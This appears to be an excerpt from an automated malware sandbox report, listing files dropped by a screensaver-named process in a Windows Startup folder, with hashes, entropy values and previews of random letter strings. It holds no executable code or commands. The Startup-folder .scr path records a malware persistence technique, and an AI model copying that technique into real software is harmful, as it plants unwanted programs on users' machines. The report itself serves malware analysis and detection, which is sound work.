                                                                                                    Preview:KATAXZVCPSXDNCRGTIEAHLTBMQUFAYSWEMLQOMHMIKPDECBCOYPMSTTHHPDKZNGFGWCNUUGIGXPEBWCPRKDGBOWPSNMTFYIHVYITPQGJYFOAJMWVQDHVSMYHPXFGNOURBBIVVVMRPWBBLQXUCAXUFAYRSTCKWXAAMKJJZILVYZNBPSMXAGXZDASFVGKBTHNGETLQIHPRIVPIVHVCSRDUBEGENZMHSYQLROJPZILEYZIFDADQNRGHABZNQMPQMEVKVERETAQUHUXWKYTSUKUXMTSIPUXJRNZOLPGLRSFBCHYWGMRDPLBUIIFHFUNFWRALBUPZLDJUHIMNWKMISYIKAQGSLGBWBFUXASKUFXDTLJAXOSBBQTQJNJAVJQLQEFEKRWWXRJNJSWYQQKPEAVJRUZGKJUAZLPHMOTXLNXAZINYPNPZNGRMVYVCYPPHKTYJCBWNURXFTCITKLDRSFMIHFZHIDPGLOTHCQFZZEHIEXWNNZRJQLWYMVUHTXHFFDTYBHDRBRNTPLBXPVFCUVAJOYOWRENFUXTSCNCCQJOSITCFTGJHFQCYISKUAVSRYASWVJRDNOYYCSYOZWHRPNSBWMHUUEYUGOXVSYKLFZAUQJZDVBEBHHGXQHZVJWNUGLSAYWIEHAJCPIOHOPCXKNVRISBGUAEMSYEGNPQXITRIIMXOLIJYUBIEQGZQUAHRWMKQHCRHKBJZQQXFYTNBHEJEWRPZRXZCXRJQVIUOATJAEYDILREREDIWFEMISEKZWNCDTIPTTOZXOZJIYMGKYIKXBLURVWBJHYFJCLGVVIMADULTTVZIOEIPMVJAOPSQCDFMYPSPGLBIQXTWTUZERGBDTCIRRVRTNGENXXRTHESXQFUQSRGUQDQWGTGXTSGDYWIQVOKABAIAJIEUVYCZXNYVKPRREMYAVDFDHWOGEKALUPBHOHENIHLFJZAHVTJIQJBKXOYIOELCIIECJBPTTASBEKGOESRDFBACPOTNMRZOG
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1026
                                                                                                    Entropy (8bit):4.699434772658264
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:Khfv+VFngw6i0t5Ut+l3kHwMDkhBlBAMFPxYaija:pvl6Pt5uQ3kQ0khBl1VxYpu
                                                                                                    MD5:02D3A9BE2018CD12945C5969F383EF4A
                                                                                                    SHA1:085F3165672114B2B8E9F73C629ADABBF99F178D
                                                                                                    SHA-256:6088E17DB4C586F5011BC5E16E8BF2E79C496EB6DAE177FF64D9713D39D500CA
                                                                                                    SHA-512:A126D98EE751D0FB768E4DB7D92CBC6AE7852FEE337B85ED045D871DB321C6C98FD58A244D058CA3F41348216C68CB4A37FA854980BB16D358AA62A932DD867E
                                                                                                    Malicious:false
                                                                                                    Preview:ONBQCLYSPUBDAQCIGYNWXHPENQNLJZGXCHXSNXZNCZBUHYDXPEMCJPAWYQSVHMGKHJUFFFYDAXDAHOLOAZEPTWZTWDGPFLXMMCXLCIIJOXMVRNMUMTICVHQSWNAGIYCQBOZZHONWWBXKDUJYBRPSLNFGTUIFTNGJEATOXKHEFMERAQZVBMQGKZUKXDBMGRJDOOGATZZKQMEZJRWZVAZRPQTVWPETCIMLPMYNWZLVLXRPUUKLNIMTYDNYIJTZEFJDNMWTOFFKRRINCRDCFGJAJNMYQHGXGVHVYPEUFBNUIGUVGBYQKIAJLIVACVIHEGZIYKSROURNGZSCTUKBKFFCGPXAONPDEBIZJRKCFYHATDXLXYKGLWXBCHJERCRNMKESIMBDNPMPBWXSVSEAAUEKEGUIJBZLAESAFZHMBLPPKMNTZAZIIYSHMWJBFTZZSKYNFJYSBRLGVHOWZUQHXUSSJESIEKHZLTLILMSMJZHXFWGJQNWQCDLXEWBZPGBTVDVCPPUFLFGNZRUKJOANJVXVTXLOQLFUIVEWTCBKOBYZMAOTIMQMJYRYLSOLSSACCLCFTVXCKKJDNWQAETNXHIOQCDTXLLVEQLNLGDIOULNFNNDXTVYYSPDWWZHDSYHBRXMUAAHJIGSGLSFKCGADPUAASYZFEZWHYDLQDUCHJXMNMTNCDCMNIJQCSGEQOGVGYBYPMTZBBFOACZMMKVFNELOMGSTCQUDRFKLFGOHOTZKZCWJWDRECGYETFYOWLYECGICMGUKZRVNHUQTLQLHUTPRZXBVYMPAFBLSWKSSKBGWCWBFEEZIAZUZGEYMYBSXYUCHEALFJRSGWQJMABNQHSZANDDTYMVJKXFFFDEENZAGRGVLHFELVOSGTXVOOPFGCQDSFWOYKKOYUHFWMXWPLHFIIPORMEJNOFYMJRBAZLYTIOKEFIWPDZUKMIWKLZXBOESUCXZXQSCMQKDKFBCHJMPMZHELLNSYYEJNBRRXVBMPD
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1026
                                                                                                    Entropy (8bit):4.699548026888946
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:pjU7tPjIpNf9XSXm/5eskkSAjuenNF0hE6mHPISZMqEv:pjU7xIpfXSipuenT0hvYIV
                                                                                                    MD5:A0DC32426FC8BF469784A49B3D092ADC
                                                                                                    SHA1:0C0EEB9B226B1B19A509D9864F8ADC521BF18350
                                                                                                    SHA-256:A381579322A3055F468E57EA1980A523CAF16ABFE5A09B46EC709E854E67AA01
                                                                                                    SHA-512:DAF85E375438A2A6CC261D75D672A9C43E80E6CB1BC1EAA1BDB7B798CDE22AEFD5A04AC1D10E6F24CDBB7F9EA0452F5CA790969C750B764B4B7F9E0C5B2A0731
                                                                                                    Malicious:false
                                                                                                    Preview:KATAXZVCPSXDNCRGTIEAHLTBMQUFAYSWEMLQOMHMIKPDECBCOYPMSTTHHPDKZNGFGWCNUUGIGXPEBWCPRKDGBOWPSNMTFYIHVYITPQGJYFOAJMWVQDHVSMYHPXFGNOURBBIVVVMRPWBBLQXUCAXUFAYRSTCKWXAAMKJJZILVYZNBPSMXAGXZDASFVGKBTHNGETLQIHPRIVPIVHVCSRDUBEGENZMHSYQLROJPZILEYZIFDADQNRGHABZNQMPQMEVKVERETAQUHUXWKYTSUKUXMTSIPUXJRNZOLPGLRSFBCHYWGMRDPLBUIIFHFUNFWRALBUPZLDJUHIMNWKMISYIKAQGSLGBWBFUXASKUFXDTLJAXOSBBQTQJNJAVJQLQEFEKRWWXRJNJSWYQQKPEAVJRUZGKJUAZLPHMOTXLNXAZINYPNPZNGRMVYVCYPPHKTYJCBWNURXFTCITKLDRSFMIHFZHIDPGLOTHCQFZZEHIEXWNNZRJQLWYMVUHTXHFFDTYBHDRBRNTPLBXPVFCUVAJOYOWRENFUXTSCNCCQJOSITCFTGJHFQCYISKUAVSRYASWVJRDNOYYCSYOZWHRPNSBWMHUUEYUGOXVSYKLFZAUQJZDVBEBHHGXQHZVJWNUGLSAYWIEHAJCPIOHOPCXKNVRISBGUAEMSYEGNPQXITRIIMXOLIJYUBIEQGZQUAHRWMKQHCRHKBJZQQXFYTNBHEJEWRPZRXZCXRJQVIUOATJAEYDILREREDIWFEMISEKZWNCDTIPTTOZXOZJIYMGKYIKXBLURVWBJHYFJCLGVVIMADULTTVZIOEIPMVJAOPSQCDFMYPSPGLBIQXTWTUZERGBDTCIRRVRTNGENXXRTHESXQFUQSRGUQDQWGTGXTSGDYWIQVOKABAIAJIEUVYCZXNYVKPRREMYAVDFDHWOGEKALUPBHOHENIHLFJZAHVTJIQJBKXOYIOELCIIECJBPTTASBEKGOESRDFBACPOTNMRZOG
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1026
                                                                                                    Entropy (8bit):4.699548026888946
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:pjU7tPjIpNf9XSXm/5eskkSAjuenNF0hE6mHPISZMqEv:pjU7xIpfXSipuenT0hvYIV
                                                                                                    MD5:A0DC32426FC8BF469784A49B3D092ADC
                                                                                                    SHA1:0C0EEB9B226B1B19A509D9864F8ADC521BF18350
                                                                                                    SHA-256:A381579322A3055F468E57EA1980A523CAF16ABFE5A09B46EC709E854E67AA01
                                                                                                    SHA-512:DAF85E375438A2A6CC261D75D672A9C43E80E6CB1BC1EAA1BDB7B798CDE22AEFD5A04AC1D10E6F24CDBB7F9EA0452F5CA790969C750B764B4B7F9E0C5B2A0731
                                                                                                    Malicious:false
                                                                                                    Preview:KATAXZVCPSXDNCRGTIEAHLTBMQUFAYSWEMLQOMHMIKPDECBCOYPMSTTHHPDKZNGFGWCNUUGIGXPEBWCPRKDGBOWPSNMTFYIHVYITPQGJYFOAJMWVQDHVSMYHPXFGNOURBBIVVVMRPWBBLQXUCAXUFAYRSTCKWXAAMKJJZILVYZNBPSMXAGXZDASFVGKBTHNGETLQIHPRIVPIVHVCSRDUBEGENZMHSYQLROJPZILEYZIFDADQNRGHABZNQMPQMEVKVERETAQUHUXWKYTSUKUXMTSIPUXJRNZOLPGLRSFBCHYWGMRDPLBUIIFHFUNFWRALBUPZLDJUHIMNWKMISYIKAQGSLGBWBFUXASKUFXDTLJAXOSBBQTQJNJAVJQLQEFEKRWWXRJNJSWYQQKPEAVJRUZGKJUAZLPHMOTXLNXAZINYPNPZNGRMVYVCYPPHKTYJCBWNURXFTCITKLDRSFMIHFZHIDPGLOTHCQFZZEHIEXWNNZRJQLWYMVUHTXHFFDTYBHDRBRNTPLBXPVFCUVAJOYOWRENFUXTSCNCCQJOSITCFTGJHFQCYISKUAVSRYASWVJRDNOYYCSYOZWHRPNSBWMHUUEYUGOXVSYKLFZAUQJZDVBEBHHGXQHZVJWNUGLSAYWIEHAJCPIOHOPCXKNVRISBGUAEMSYEGNPQXITRIIMXOLIJYUBIEQGZQUAHRWMKQHCRHKBJZQQXFYTNBHEJEWRPZRXZCXRJQVIUOATJAEYDILREREDIWFEMISEKZWNCDTIPTTOZXOZJIYMGKYIKXBLURVWBJHYFJCLGVVIMADULTTVZIOEIPMVJAOPSQCDFMYPSPGLBIQXTWTUZERGBDTCIRRVRTNGENXXRTHESXQFUQSRGUQDQWGTGXTSGDYWIQVOKABAIAJIEUVYCZXNYVKPRREMYAVDFDHWOGEKALUPBHOHENIHLFJZAHVTJIQJBKXOYIOELCIIECJBPTTASBEKGOESRDFBACPOTNMRZOG
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1026
                                                                                                    Entropy (8bit):4.694982189683734
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:MggAXr5945qa/jgwHvsjCIShLGmTSIp/6co4rHg+X:MgJXr5+pjBsUhJTSIGA
                                                                                                    MD5:E49F84B05A175C231342E6B705A24A44
                                                                                                    SHA1:41B4E74B5F82D72435DFF38DD1B8B6026691CB4E
                                                                                                    SHA-256:EE0E867E83FE0206F33F009F216D2986AE3903B6F8944FBE2CC36586E5844626
                                                                                                    SHA-512:84E29127671A2D2539F2E340C3465736F68C5545A256F9C2813B6BF955645A629FD80BCFF7CEC902F07492C1E40C0794C2D3A906DD402BACA5E647BDFA2B88AA
                                                                                                    Malicious:false
                                                                                                    Preview:KZWFNRXYKIQQDFEFEKFUFTLSCHHVHHFJVLINSSPODUWFGYCFXENRRFQZQNVRFJLXTKRPVZFZUDBIVIHPJCTZSMJNOWNCQAPYYHLTMHJJYECMUWUKYXMYBEVYHAFCNHVTPHXQKEQMWLDZKOKDMDUORJRRWKHVJLZNSFERFDAFUHPRYSOCWFZCHPEXICNDGFOZLLLNASUKYIOHUBCGSHVHTAAMQFTBUNSBDIPJOCUDVCBYOUPDCATAMJESONSVVDFARQOQHDTKDRVDWNHMPSWQTCDBOSQIMASLDMFOKOIPUFJNASKNMQOVCYYFVCKNWJBVIBCWMYJGLWMAZWJABPWRYFHPZVZTRFLFKJIVQMYASPFSBODYXKEEFHBTFSHZEWSGAGGMSRRYSACIWVPBTHVGVVYONDRAYVOWBYTTLWWPGWQAJDLYFDALUZCIBUOEBMSCKJILYNBNADCKXDVTLOFEMKULPCSYYTTPBZKLBPMPEQZHPJCMRWISRYUKSYBUOCFXUPORADUTYINWCOLTVNYNBVHTATWIAMJBNCYZTMQLJOZXQMVQWJAGLZBDTPNMMKABCUCOYDSRVMYDKVJFRZRLIKSQNEMHUWIXWIACERSGEBQFEQJLXFLCITYZWKHIASCUIPVHOXQGWHFWSXEHOMVVXNFDEKOTOBBAEPJTBOCEJGWYSJBHWDRPPONMLWEDWWLGQVWLLREHLEZFZNEDNRDQMBTZWCUIFLPBHTTQGIEVFRJKMYLHMYUOCAAUGIRMYSCUPKJDFUJBVKKJHICSXHPXWUGXGPHCKBZLZXDCKURFIMZGIDDJWPBHEERWPLLCNTTKZRNYIMGHNYECXBHHHWCVILLPFPVXYOQODPYIIVKTOODIUKCMBBWHUEFORQUJCVYVBOBKKLPQJMOJEUOFUFAAJRTAZTXJJQPOORSRNCQDMHWVYQIGGCMZGYMXIBAKRNOPIPQWJHZEWBBJTYBESJTCCPYZHONYNVOXCBHCXRST
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1026
                                                                                                    Entropy (8bit):4.696250160603532
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:5Gvoddnzj/gxR0e7uyJ9MLyy07KpRnPgNcnA+2/nSgTfK0Xzy:wv4zCR0ouAMG3wPgNuAZnSQXzy
                                                                                                    MD5:2B6A90B7D410E3A4E2B32C90D816B4FE
                                                                                                    SHA1:B8CD90C4CDCF41CBF18D88A4C01BBA22F670AD83
                                                                                                    SHA-256:D65D483904467EB7373EDA8DFAE2070C057FC93465A4AC5C9FEF8B42340D9DAB
                                                                                                    SHA-512:03AFBF42E5C04E928D03C687B0F17A0AB15428C78958B206DC6C50118B961C9DDF88A6E53B3115F09FDEE44EAFA46B262933164055532D3B4B4F9265F42A6C58
                                                                                                    Malicious:false
                                                                                                    Preview:NWTVCDUMOBTPRQQPHXQLIMGPJXTEMPBNYLBFKQFUEVGISJSVQRMPMZSAYEYQSOTUAJFILXLTKFEVHLSAMYEEFLNJSHLTTFXRTDNUGXEFIGVCAWPMDNUICDIZGPHMESKWSMUPNOFEVXFTSHSKLCVHQTNKDHDMDRJOUTEUSCAUAVMVBMOSYKKRPPZYFUGXFXWMWRACKFCQOUHITLUCHGFZEOIPNCJFJOVBZIKDRNERXOSPKSRMHKTJUGFEOONFWLVNTJWXUFPADWYIUDKAZQXCZRFPUQQAMRTIOEHUDTLGOWYMIDOZAXTLGVEGUCQLJZGMIEQYOLWEMSGZUBWXOIBQEMQLQVGRBTUICFCEJGFTZRZCKJQEMATEONIMJKBYGQYDYXOLLROWXGYCNCVPTMRZSMMSZXKMNPSCJJJKKNRAJXGSLZNKJRJRGMCCCBCIGTLTFKNVDVIHYLGRNXDVIVWBCPNKNIFJAPQQWDQQEDDKNHVJRQJTKCUADORWREEDYTVFAOWHPNXWSNAJCVXCLLTNQPMJQHDILFNQUZJZZJJMMNDNGEBEGSTVAGZJMSMZHWJKNIAFGBUYMVADKCVLDGFQETUZXGUOUWXBBPNOWFERKMKMPOXIOTKJERPVXJGCIUKAGDGITLFYRIBAPKRESMNOMTVTZCXMODUUIGFMEMBMGAGXFZGAAZFCXDWBKKCPUKFFNMVKDFFVZYWKEKBWMADWDZXUIOOLCLIACESGRBJRSMXKUSOKXJEICCPRFWSISDTKVTDVAYSWLRHTWJGCXQMNITQJHCBMSCDRWKMGADWILLATOPVPILEQQGAIPRRUCJFTRRSSWITQKIWJOATZOBETZDBBWAIJIOXCUQSILQHQKEZXWFWWNVEWKZCGFYPBDSDBSFAZDZFRHJBZIGOZCVUGODUTNCDHKKMFHSYKUSFSXOMOUXZYOSUZNJQBXAVPOBTVBINMSIPYONLYRKIHONKWHSUAJWIALOTZAQJSNTIH
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1026
                                                                                                    Entropy (8bit):4.699434772658264
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:Khfv+VFngw6i0t5Ut+l3kHwMDkhBlBAMFPxYaija:pvl6Pt5uQ3kQ0khBl1VxYpu
                                                                                                    MD5:02D3A9BE2018CD12945C5969F383EF4A
                                                                                                    SHA1:085F3165672114B2B8E9F73C629ADABBF99F178D
                                                                                                    SHA-256:6088E17DB4C586F5011BC5E16E8BF2E79C496EB6DAE177FF64D9713D39D500CA
                                                                                                    SHA-512:A126D98EE751D0FB768E4DB7D92CBC6AE7852FEE337B85ED045D871DB321C6C98FD58A244D058CA3F41348216C68CB4A37FA854980BB16D358AA62A932DD867E
                                                                                                    Malicious:false
                                                                                                    Preview:ONBQCLYSPUBDAQCIGYNWXHPENQNLJZGXCHXSNXZNCZBUHYDXPEMCJPAWYQSVHMGKHJUFFFYDAXDAHOLOAZEPTWZTWDGPFLXMMCXLCIIJOXMVRNMUMTICVHQSWNAGIYCQBOZZHONWWBXKDUJYBRPSLNFGTUIFTNGJEATOXKHEFMERAQZVBMQGKZUKXDBMGRJDOOGATZZKQMEZJRWZVAZRPQTVWPETCIMLPMYNWZLVLXRPUUKLNIMTYDNYIJTZEFJDNMWTOFFKRRINCRDCFGJAJNMYQHGXGVHVYPEUFBNUIGUVGBYQKIAJLIVACVIHEGZIYKSROURNGZSCTUKBKFFCGPXAONPDEBIZJRKCFYHATDXLXYKGLWXBCHJERCRNMKESIMBDNPMPBWXSVSEAAUEKEGUIJBZLAESAFZHMBLPPKMNTZAZIIYSHMWJBFTZZSKYNFJYSBRLGVHOWZUQHXUSSJESIEKHZLTLILMSMJZHXFWGJQNWQCDLXEWBZPGBTVDVCPPUFLFGNZRUKJOANJVXVTXLOQLFUIVEWTCBKOBYZMAOTIMQMJYRYLSOLSSACCLCFTVXCKKJDNWQAETNXHIOQCDTXLLVEQLNLGDIOULNFNNDXTVYYSPDWWZHDSYHBRXMUAAHJIGSGLSFKCGADPUAASYZFEZWHYDLQDUCHJXMNMTNCDCMNIJQCSGEQOGVGYBYPMTZBBFOACZMMKVFNELOMGSTCQUDRFKLFGOHOTZKZCWJWDRECGYETFYOWLYECGICMGUKZRVNHUQTLQLHUTPRZXBVYMPAFBLSWKSSKBGWCWBFEEZIAZUZGEYMYBSXYUCHEALFJRSGWQJMABNQHSZANDDTYMVJKXFFFDEENZAGRGVLHFELVOSGTXVOOPFGCQDSFWOYKKOYUHFWMXWPLHFIIPORMEJNOFYMJRBAZLYTIOKEFIWPDZUKMIWKLZXBOESUCXZXQSCMQKDKFBCHJMPMZHELLNSYYEJNBRRXVBMPD
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1026
                                                                                                    Entropy (8bit):4.695685570184741
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:SYuCgqv/1uycbC6SHsJPWXpOxTeVtblICcFX4xlyzK7y45wR39IRh:S1CPvsC6YE+XgleVtbQuKGf5M39IRh
                                                                                                    MD5:A28F7445BB3D064C83EB9DBC98091F76
                                                                                                    SHA1:D4E174D2D26333FCB66D3FD84E3D0F67AF41D182
                                                                                                    SHA-256:10A802E683A2C669BB581DE0A192C8291DD2D53D89A2883A59CC29EB14453B93
                                                                                                    SHA-512:42526FEC4220E50DB60BD7D83A07DEB9D5BE4F63AD093B518E9ECC86B779210B0170F6F64C9F16064D50CB12F03643BAC9995D4F3C0AFD5F8D38428D57ADE487
                                                                                                    Malicious:false
                                                                                                    Preview:UMMBDNEQBNVIMBNGHYZCBKXWMQJKYISTANSRNFXXBKALIIEMEWAFQEPTEMZCIXXNMQBGOXWSDYSAWKIYPJITNREMVRXPPJZFUTMGRRRGTCHVLEWVUJGZEUQVONQVACEFWZUCIAFXPFGXIUOOBZEEMGMWJQIEKKICYJJWAFUKYZAJEGUQKGDPRPXCOWIPBRUGHWDFZLGSKZVCHVVPGLEFNGIVLBVNAOVXAPGATADJBIQTBNJGWXRSEYKCSVZOSTCBHYFHUDEWNGEIFCVREPZDZDZRITFEVFCQQWJYZXPUKJWHTWGWASTKDCAVEWZOIGFZHRWCJBVRLDWGVKPABCQUOHQIMLUFUGYGMPGPEMSRPPSGWIGRVPBGZIWLNEVYFFJBCMBSXVABNRNXULCTUAANAXDHKZOGVCNQZHMRBENWTTLQVVMDLNBEWHLPZHMPDGRLJWAQJDJRCWTFWIOLAURRCSMFJOCFDKUGPLTPABARXKPCRXOIHHVRWXAKGHOTYLCEQQYYDKVZQSYLCAEGGBQMMJGSNJWBTJXSVALINNRLURMPNGFXHJRVJIKQJSDLNIOXGIGDFDCOTGGXMDLTDYSIKCMPVINDDXXQCEQCRUBLFEWMYMSEGUHIKIGUYOMOXSKOTVNUNGWUFYKYRNZXOOTSRYXLZHRZXNEDJUNPYGNIIZSPVQBOLBRRRWGDMQWUTRSZWBYMXNMLKLFNZWJVDDPMJOXTVBMYRXNQFGBLURKFIUAHJBFFXNWQDYRLZADYGMETNXEOXLOJKYQPEYHUVTFGXQTGPQBWZQTVFXZFUVQERQZJCYYPFBYONAVFDOLTNRGWQYGSYWCWUWRETJZGVJMEFQTYPOLONVZFREVORMBQJOCLOALCJHHCHQSHKLUNBIRHRBSQSMERLKKFTGHUQKRPFIIELZZVXZVNHCIQYYXNMJNSOZOIRGGJKUWXNCWSNCFMGQIQVNKVIGRCLSDWQPEDLSLTGBRXRTMGFWYQSCLN
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1026
                                                                                                    Entropy (8bit):4.694982189683734
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:MggAXr5945qa/jgwHvsjCIShLGmTSIp/6co4rHg+X:MgJXr5+pjBsUhJTSIGA
                                                                                                    MD5:E49F84B05A175C231342E6B705A24A44
                                                                                                    SHA1:41B4E74B5F82D72435DFF38DD1B8B6026691CB4E
                                                                                                    SHA-256:EE0E867E83FE0206F33F009F216D2986AE3903B6F8944FBE2CC36586E5844626
                                                                                                    SHA-512:84E29127671A2D2539F2E340C3465736F68C5545A256F9C2813B6BF955645A629FD80BCFF7CEC902F07492C1E40C0794C2D3A906DD402BACA5E647BDFA2B88AA
                                                                                                    Malicious:false
                                                                                                    Preview:KZWFNRXYKIQQDFEFEKFUFTLSCHHVHHFJVLINSSPODUWFGYCFXENRRFQZQNVRFJLXTKRPVZFZUDBIVIHPJCTZSMJNOWNCQAPYYHLTMHJJYECMUWUKYXMYBEVYHAFCNHVTPHXQKEQMWLDZKOKDMDUORJRRWKHVJLZNSFERFDAFUHPRYSOCWFZCHPEXICNDGFOZLLLNASUKYIOHUBCGSHVHTAAMQFTBUNSBDIPJOCUDVCBYOUPDCATAMJESONSVVDFARQOQHDTKDRVDWNHMPSWQTCDBOSQIMASLDMFOKOIPUFJNASKNMQOVCYYFVCKNWJBVIBCWMYJGLWMAZWJABPWRYFHPZVZTRFLFKJIVQMYASPFSBODYXKEEFHBTFSHZEWSGAGGMSRRYSACIWVPBTHVGVVYONDRAYVOWBYTTLWWPGWQAJDLYFDALUZCIBUOEBMSCKJILYNBNADCKXDVTLOFEMKULPCSYYTTPBZKLBPMPEQZHPJCMRWISRYUKSYBUOCFXUPORADUTYINWCOLTVNYNBVHTATWIAMJBNCYZTMQLJOZXQMVQWJAGLZBDTPNMMKABCUCOYDSRVMYDKVJFRZRLIKSQNEMHUWIXWIACERSGEBQFEQJLXFLCITYZWKHIASCUIPVHOXQGWHFWSXEHOMVVXNFDEKOTOBBAEPJTBOCEJGWYSJBHWDRPPONMLWEDWWLGQVWLLREHLEZFZNEDNRDQMBTZWCUIFLPBHTTQGIEVFRJKMYLHMYUOCAAUGIRMYSCUPKJDFUJBVKKJHICSXHPXWUGXGPHCKBZLZXDCKURFIMZGIDDJWPBHEERWPLLCNTTKZRNYIMGHNYECXBHHHWCVILLPFPVXYOQODPYIIVKTOODIUKCMBBWHUEFORQUJCVYVBOBKKLPQJMOJEUOFUFAAJRTAZTXJJQPOORSRNCQDMHWVYQIGGCMZGYMXIBAKRNOPIPQWJHZEWBBJTYBESJTCCPYZHONYNVOXCBHCXRST
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1026
                                                                                                    Entropy (8bit):4.695685570184741
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:SYuCgqv/1uycbC6SHsJPWXpOxTeVtblICcFX4xlyzK7y45wR39IRh:S1CPvsC6YE+XgleVtbQuKGf5M39IRh
                                                                                                    MD5:A28F7445BB3D064C83EB9DBC98091F76
                                                                                                    SHA1:D4E174D2D26333FCB66D3FD84E3D0F67AF41D182
                                                                                                    SHA-256:10A802E683A2C669BB581DE0A192C8291DD2D53D89A2883A59CC29EB14453B93
                                                                                                    SHA-512:42526FEC4220E50DB60BD7D83A07DEB9D5BE4F63AD093B518E9ECC86B779210B0170F6F64C9F16064D50CB12F03643BAC9995D4F3C0AFD5F8D38428D57ADE487
                                                                                                    Malicious:false
                                                                                                    Preview:UMMBDNEQBNVIMBNGHYZCBKXWMQJKYISTANSRNFXXBKALIIEMEWAFQEPTEMZCIXXNMQBGOXWSDYSAWKIYPJITNREMVRXPPJZFUTMGRRRGTCHVLEWVUJGZEUQVONQVACEFWZUCIAFXPFGXIUOOBZEEMGMWJQIEKKICYJJWAFUKYZAJEGUQKGDPRPXCOWIPBRUGHWDFZLGSKZVCHVVPGLEFNGIVLBVNAOVXAPGATADJBIQTBNJGWXRSEYKCSVZOSTCBHYFHUDEWNGEIFCVREPZDZDZRITFEVFCQQWJYZXPUKJWHTWGWASTKDCAVEWZOIGFZHRWCJBVRLDWGVKPABCQUOHQIMLUFUGYGMPGPEMSRPPSGWIGRVPBGZIWLNEVYFFJBCMBSXVABNRNXULCTUAANAXDHKZOGVCNQZHMRBENWTTLQVVMDLNBEWHLPZHMPDGRLJWAQJDJRCWTFWIOLAURRCSMFJOCFDKUGPLTPABARXKPCRXOIHHVRWXAKGHOTYLCEQQYYDKVZQSYLCAEGGBQMMJGSNJWBTJXSVALINNRLURMPNGFXHJRVJIKQJSDLNIOXGIGDFDCOTGGXMDLTDYSIKCMPVINDDXXQCEQCRUBLFEWMYMSEGUHIKIGUYOMOXSKOTVNUNGWUFYKYRNZXOOTSRYXLZHRZXNEDJUNPYGNIIZSPVQBOLBRRRWGDMQWUTRSZWBYMXNMLKLFNZWJVDDPMJOXTVBMYRXNQFGBLURKFIUAHJBFFXNWQDYRLZADYGMETNXEOXLOJKYQPEYHUVTFGXQTGPQBWZQTVFXZFUVQERQZJCYYPFBYONAVFDOLTNRGWQYGSYWCWUWRETJZGVJMEFQTYPOLONVZFREVORMBQJOCLOALCJHHCHQSHKLUNBIRHRBSQSMERLKKFTGHUQKRPFIIELZZVXZVNHCIQYYXNMJNSOZOIRGGJKUWXNCWSNCFMGQIQVNKVIGRCLSDWQPEDLSLTGBRXRTMGFWYQSCLN
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1026
                                                                                                    Entropy (8bit):4.701757898321461
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:JTbqccbbEKOWHOHPG9HXJMTwDwW63KkUdx/d:JTbmzOxeRaTaq3KBL/d
                                                                                                    MD5:520219000D5681B63804A2D138617B27
                                                                                                    SHA1:2C7827C354FD7A58FB662266B7E3008AFB42C567
                                                                                                    SHA-256:C072675E83E91FC0F8D89A2AEC6E3BC1DB53ADF7601864DDC27B1866A8AEEF4D
                                                                                                    SHA-512:C558140907F6C78EB74EE0F053B0505A8BB72692B378F25B518FA417D97CCB2D0A8341691BECAA96ADCE757007D6DC2938995D983AAC65024123BB63715EBD7C
                                                                                                    Malicious:false
